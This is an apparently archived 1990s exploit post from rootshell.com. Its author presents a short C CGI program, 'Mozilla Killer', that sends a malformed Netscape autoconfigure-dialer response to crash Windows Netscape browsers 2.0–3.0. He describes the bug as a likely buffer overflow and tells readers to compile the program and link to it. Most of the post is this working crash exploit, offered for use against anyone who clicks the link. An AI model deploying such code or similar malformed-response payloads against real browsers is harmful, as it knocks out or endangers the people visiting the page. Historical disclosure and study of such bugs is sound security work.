
[ http://www.rootshell.com/ ]

Here's an exploit for a bug that I found in Netscape.  I believe there is a
buffer overflow here.  Netscape finally fixed this bug in 4.0 so I'm
distributing this now.

--cut--

/*

 Mozilla Killer

 Crashes all Windows Netscape browsers v2.0-3.0.  May work on the newer
 3.0 Macintosh versions.  Simply compile and make an href to this
 cgi and kab00m!

 <kit@connectnet.com>

 */

#include <stdio.h>

void
main (void)
{
  printf ("Content-type: application/x-netscape-autoconfigure-dialer\n\n");
  printf ("%c%c %c%c ", 237, 237, 237, 237);
}



